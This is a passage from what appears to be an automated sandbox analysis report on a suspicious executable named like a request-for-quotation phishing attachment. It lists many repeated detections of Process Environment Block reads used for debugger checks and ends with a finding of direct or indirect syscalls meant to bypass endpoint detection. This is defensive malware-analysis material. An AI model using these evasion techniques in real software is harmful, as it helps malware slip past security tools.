            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B92FF mov eax, dword ptr fs:[00000030h]2_2_013B92FF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01440283 mov eax, dword ptr fs:[00000030h]2_2_01440283
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01440283 mov eax, dword ptr fs:[00000030h]2_2_01440283
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01440283 mov eax, dword ptr fs:[00000030h]2_2_01440283
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01495283 mov eax, dword ptr fs:[00000030h]2_2_01495283
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D02E1 mov eax, dword ptr fs:[00000030h]2_2_013D02E1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D02E1 mov eax, dword ptr fs:[00000030h]2_2_013D02E1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D02E1 mov eax, dword ptr fs:[00000030h]2_2_013D02E1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014562A0 mov eax, dword ptr fs:[00000030h]2_2_014562A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014562A0 mov ecx, dword ptr fs:[00000030h]2_2_014562A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014562A0 mov eax, dword ptr fs:[00000030h]2_2_014562A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014562A0 mov eax, dword ptr fs:[00000030h]2_2_014562A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014562A0 mov eax, dword ptr fs:[00000030h]2_2_014562A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014562A0 mov eax, dword ptr fs:[00000030h]2_2_014562A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014572A0 mov eax, dword ptr fs:[00000030h]2_2_014572A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014572A0 mov eax, dword ptr fs:[00000030h]2_2_014572A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BB2D3 mov eax, dword ptr fs:[00000030h]2_2_013BB2D3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BB2D3 mov eax, dword ptr fs:[00000030h]2_2_013BB2D3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BB2D3 mov eax, dword ptr fs:[00000030h]2_2_013BB2D3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF2D0 mov eax, dword ptr fs:[00000030h]2_2_013EF2D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF2D0 mov eax, dword ptr fs:[00000030h]2_2_013EF2D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014892A6 mov eax, dword ptr fs:[00000030h]2_2_014892A6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014892A6 mov eax, dword ptr fs:[00000030h]2_2_014892A6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014892A6 mov eax, dword ptr fs:[00000030h]2_2_014892A6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014892A6 mov eax, dword ptr fs:[00000030h]2_2_014892A6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014492BC mov eax, dword ptr fs:[00000030h]2_2_014492BC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014492BC mov eax, dword ptr fs:[00000030h]2_2_014492BC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014492BC mov ecx, dword ptr fs:[00000030h]2_2_014492BC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014492BC mov ecx, dword ptr fs:[00000030h]2_2_014492BC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C92C5 mov eax, dword ptr fs:[00000030h]2_2_013C92C5
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C92C5 mov eax, dword ptr fs:[00000030h]2_2_013C92C5
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB2C0 mov eax, dword ptr fs:[00000030h]2_2_013EB2C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB2C0 mov eax, dword ptr fs:[00000030h]2_2_013EB2C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB2C0 mov eax, dword ptr fs:[00000030h]2_2_013EB2C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB2C0 mov eax, dword ptr fs:[00000030h]2_2_013EB2C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB2C0 mov eax, dword ptr fs:[00000030h]2_2_013EB2C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB2C0 mov eax, dword ptr fs:[00000030h]2_2_013EB2C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB2C0 mov eax, dword ptr fs:[00000030h]2_2_013EB2C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA2C3 mov eax, dword ptr fs:[00000030h]2_2_013CA2C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA2C3 mov eax, dword ptr fs:[00000030h]2_2_013CA2C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA2C3 mov eax, dword ptr fs:[00000030h]2_2_013CA2C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA2C3 mov eax, dword ptr fs:[00000030h]2_2_013CA2C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA2C3 mov eax, dword ptr fs:[00000030h]2_2_013CA2C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE53E mov eax, dword ptr fs:[00000030h]2_2_013EE53E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE53E mov eax, dword ptr fs:[00000030h]2_2_013EE53E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE53E mov eax, dword ptr fs:[00000030h]2_2_013EE53E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE53E mov eax, dword ptr fs:[00000030h]2_2_013EE53E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE53E mov eax, dword ptr fs:[00000030h]2_2_013EE53E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D0535 mov eax, dword ptr fs:[00000030h]2_2_013D0535
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D0535 mov eax, dword ptr fs:[00000030h]2_2_013D0535
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D0535 mov eax, dword ptr fs:[00000030h]2_2_013D0535
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D0535 mov eax, dword ptr fs:[00000030h]2_2_013D0535
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D0535 mov eax, dword ptr fs:[00000030h]2_2_013D0535
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D0535 mov eax, dword ptr fs:[00000030h]2_2_013D0535
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CD534 mov eax, dword ptr fs:[00000030h]2_2_013CD534
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CD534 mov eax, dword ptr fs:[00000030h]2_2_013CD534
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CD534 mov eax, dword ptr fs:[00000030h]2_2_013CD534
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CD534 mov eax, dword ptr fs:[00000030h]2_2_013CD534
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CD534 mov eax, dword ptr fs:[00000030h]2_2_013CD534
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CD534 mov eax, dword ptr fs:[00000030h]2_2_013CD534
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FD530 mov eax, dword ptr fs:[00000030h]2_2_013FD530
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FD530 mov eax, dword ptr fs:[00000030h]2_2_013FD530
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F7505 mov eax, dword ptr fs:[00000030h]2_2_013F7505
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F7505 mov ecx, dword ptr fs:[00000030h]2_2_013F7505
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01456500 mov eax, dword ptr fs:[00000030h]2_2_01456500
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01494500 mov eax, dword ptr fs:[00000030h]2_2_01494500
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01494500 mov eax, dword ptr fs:[00000030h]2_2_01494500
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01494500 mov eax, dword ptr fs:[00000030h]2_2_01494500
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01494500 mov eax, dword ptr fs:[00000030h]2_2_01494500
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01494500 mov eax, dword ptr fs:[00000030h]2_2_01494500
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01494500 mov eax, dword ptr fs:[00000030h]2_2_01494500
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01494500 mov eax, dword ptr fs:[00000030h]2_2_01494500
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FB570 mov eax, dword ptr fs:[00000030h]2_2_013FB570
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FB570 mov eax, dword ptr fs:[00000030h]2_2_013FB570
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F656A mov eax, dword ptr fs:[00000030h]2_2_013F656A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F656A mov eax, dword ptr fs:[00000030h]2_2_013F656A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F656A mov eax, dword ptr fs:[00000030h]2_2_013F656A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BB562 mov eax, dword ptr fs:[00000030h]2_2_013BB562
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146F525 mov eax, dword ptr fs:[00000030h]2_2_0146F525
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146F525 mov eax, dword ptr fs:[00000030h]2_2_0146F525
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146F525 mov eax, dword ptr fs:[00000030h]2_2_0146F525
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146F525 mov eax, dword ptr fs:[00000030h]2_2_0146F525
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146F525 mov eax, dword ptr fs:[00000030h]2_2_0146F525
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146F525 mov eax, dword ptr fs:[00000030h]2_2_0146F525
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146F525 mov eax, dword ptr fs:[00000030h]2_2_0146F525
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147B52F mov eax, dword ptr fs:[00000030h]2_2_0147B52F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C8550 mov eax, dword ptr fs:[00000030h]2_2_013C8550
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C8550 mov eax, dword ptr fs:[00000030h]2_2_013C8550
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01495537 mov eax, dword ptr fs:[00000030h]2_2_01495537
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014955C9 mov eax, dword ptr fs:[00000030h]2_2_014955C9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF5B0 mov eax, dword ptr fs:[00000030h]2_2_013EF5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E45B1 mov eax, dword ptr fs:[00000030h]2_2_013E45B1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E45B1 mov eax, dword ptr fs:[00000030h]2_2_013E45B1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D5D0 mov eax, dword ptr fs:[00000030h]2_2_0143D5D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D5D0 mov ecx, dword ptr fs:[00000030h]2_2_0143D5D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15A9 mov eax, dword ptr fs:[00000030h]2_2_013E15A9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15A9 mov eax, dword ptr fs:[00000030h]2_2_013E15A9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15A9 mov eax, dword ptr fs:[00000030h]2_2_013E15A9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15A9 mov eax, dword ptr fs:[00000030h]2_2_013E15A9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15A9 mov eax, dword ptr fs:[00000030h]2_2_013E15A9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014935D7 mov eax, dword ptr fs:[00000030h]2_2_014935D7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014935D7 mov eax, dword ptr fs:[00000030h]2_2_014935D7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014935D7 mov eax, dword ptr fs:[00000030h]2_2_014935D7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FE59C mov eax, dword ptr fs:[00000030h]2_2_013FE59C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B758F mov eax, dword ptr fs:[00000030h]2_2_013B758F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B758F mov eax, dword ptr fs:[00000030h]2_2_013B758F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B758F mov eax, dword ptr fs:[00000030h]2_2_013B758F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F4588 mov eax, dword ptr fs:[00000030h]2_2_013F4588
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C2582 mov eax, dword ptr fs:[00000030h]2_2_013C2582
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C2582 mov ecx, dword ptr fs:[00000030h]2_2_013C2582
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15F4 mov eax, dword ptr fs:[00000030h]2_2_013E15F4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15F4 mov eax, dword ptr fs:[00000030h]2_2_013E15F4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15F4 mov eax, dword ptr fs:[00000030h]2_2_013E15F4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15F4 mov eax, dword ptr fs:[00000030h]2_2_013E15F4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15F4 mov eax, dword ptr fs:[00000030h]2_2_013E15F4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E15F4 mov eax, dword ptr fs:[00000030h]2_2_013E15F4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144B594 mov eax, dword ptr fs:[00000030h]2_2_0144B594
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144B594 mov eax, dword ptr fs:[00000030h]2_2_0144B594
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FC5ED mov eax, dword ptr fs:[00000030h]2_2_013FC5ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FC5ED mov eax, dword ptr fs:[00000030h]2_2_013FC5ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE5E7 mov eax, dword ptr fs:[00000030h]2_2_013EE5E7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE5E7 mov eax, dword ptr fs:[00000030h]2_2_013EE5E7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE5E7 mov eax, dword ptr fs:[00000030h]2_2_013EE5E7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE5E7 mov eax, dword ptr fs:[00000030h]2_2_013EE5E7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE5E7 mov eax, dword ptr fs:[00000030h]2_2_013EE5E7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE5E7 mov eax, dword ptr fs:[00000030h]2_2_013EE5E7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE5E7 mov eax, dword ptr fs:[00000030h]2_2_013EE5E7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EE5E7 mov eax, dword ptr fs:[00000030h]2_2_013EE5E7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C25E0 mov eax, dword ptr fs:[00000030h]2_2_013C25E0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014405A7 mov eax, dword ptr fs:[00000030h]2_2_014405A7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014405A7 mov eax, dword ptr fs:[00000030h]2_2_014405A7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014405A7 mov eax, dword ptr fs:[00000030h]2_2_014405A7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E95DA mov eax, dword ptr fs:[00000030h]2_2_013E95DA
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C65D0 mov eax, dword ptr fs:[00000030h]2_2_013C65D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FA5D0 mov eax, dword ptr fs:[00000030h]2_2_013FA5D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FA5D0 mov eax, dword ptr fs:[00000030h]2_2_013FA5D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FE5CF mov eax, dword ptr fs:[00000030h]2_2_013FE5CF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FE5CF mov eax, dword ptr fs:[00000030h]2_2_013FE5CF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147F5BE mov eax, dword ptr fs:[00000030h]2_2_0147F5BE
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014535BA mov eax, dword ptr fs:[00000030h]2_2_014535BA
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014535BA mov eax, dword ptr fs:[00000030h]2_2_014535BA
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014535BA mov eax, dword ptr fs:[00000030h]2_2_014535BA
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014535BA mov eax, dword ptr fs:[00000030h]2_2_014535BA
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F55C0 mov eax, dword ptr fs:[00000030h]2_2_013F55C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147F453 mov eax, dword ptr fs:[00000030h]2_2_0147F453
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE420 mov eax, dword ptr fs:[00000030h]2_2_013BE420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE420 mov eax, dword ptr fs:[00000030h]2_2_013BE420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE420 mov eax, dword ptr fs:[00000030h]2_2_013BE420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BC427 mov eax, dword ptr fs:[00000030h]2_2_013BC427
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144C460 mov ecx, dword ptr fs:[00000030h]2_2_0144C460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E340D mov eax, dword ptr fs:[00000030h]2_2_013E340D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0149547F mov eax, dword ptr fs:[00000030h]2_2_0149547F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F8402 mov eax, dword ptr fs:[00000030h]2_2_013F8402
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F8402 mov eax, dword ptr fs:[00000030h]2_2_013F8402
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F8402 mov eax, dword ptr fs:[00000030h]2_2_013F8402
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EA470 mov eax, dword ptr fs:[00000030h]2_2_013EA470
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EA470 mov eax, dword ptr fs:[00000030h]2_2_013EA470
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EA470 mov eax, dword ptr fs:[00000030h]2_2_013EA470
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01447410 mov eax, dword ptr fs:[00000030h]2_2_01447410
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C1460 mov eax, dword ptr fs:[00000030h]2_2_013C1460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C1460 mov eax, dword ptr fs:[00000030h]2_2_013C1460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C1460 mov eax, dword ptr fs:[00000030h]2_2_013C1460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C1460 mov eax, dword ptr fs:[00000030h]2_2_013C1460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C1460 mov eax, dword ptr fs:[00000030h]2_2_013C1460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DF460 mov eax, dword ptr fs:[00000030h]2_2_013DF460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DF460 mov eax, dword ptr fs:[00000030h]2_2_013DF460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DF460 mov eax, dword ptr fs:[00000030h]2_2_013DF460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DF460 mov eax, dword ptr fs:[00000030h]2_2_013DF460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DF460 mov eax, dword ptr fs:[00000030h]2_2_013DF460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DF460 mov eax, dword ptr fs:[00000030h]2_2_013DF460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E245A mov eax, dword ptr fs:[00000030h]2_2_013E245A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01446420 mov eax, dword ptr fs:[00000030h]2_2_01446420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01446420 mov eax, dword ptr fs:[00000030h]2_2_01446420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01446420 mov eax, dword ptr fs:[00000030h]2_2_01446420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01446420 mov eax, dword ptr fs:[00000030h]2_2_01446420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01446420 mov eax, dword ptr fs:[00000030h]2_2_01446420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01446420 mov eax, dword ptr fs:[00000030h]2_2_01446420
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
